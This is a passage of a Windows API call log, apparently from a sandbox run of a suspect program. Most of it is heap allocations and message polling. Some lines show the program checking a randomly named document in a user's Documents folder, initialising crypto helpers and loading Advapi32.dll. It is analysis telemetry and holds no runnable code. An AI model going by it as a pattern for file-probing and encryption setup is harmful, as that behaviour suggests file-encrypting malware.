[0266.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0266.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0266.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0266.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e58 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0266.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0266.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0266.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0266.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0266.941] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0266.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0266.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0266.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0266.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0266.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.942] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0266.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0266.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0266.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0266.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.945] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/pTQouiVh4lNVdQWF_W.rtf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25cc7eb0, ftCreationTime.dwHighDateTime=0x1d5e554, ftLastAccessTime.dwLowDateTime=0x29510eb0, ftLastAccessTime.dwHighDateTime=0x1d5e65e, ftLastWriteTime.dwLowDateTime=0x29510eb0, ftLastWriteTime.dwHighDateTime=0x1d5e65e, nFileSizeHigh=0x0, nFileSizeLow=0xf68f, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="pTQouiVh4lNVdQWF_W.rtf", cAlternateFileName="PTQOUI~1.RTF")) returned 0xa87590 [0266.945] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0266.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0266.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0266.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.946] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.946] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0266.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0266.946] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0266.946] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0266.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0266.947] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0266.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0266.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0266.947] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.948] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.948] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.948] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.948] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", 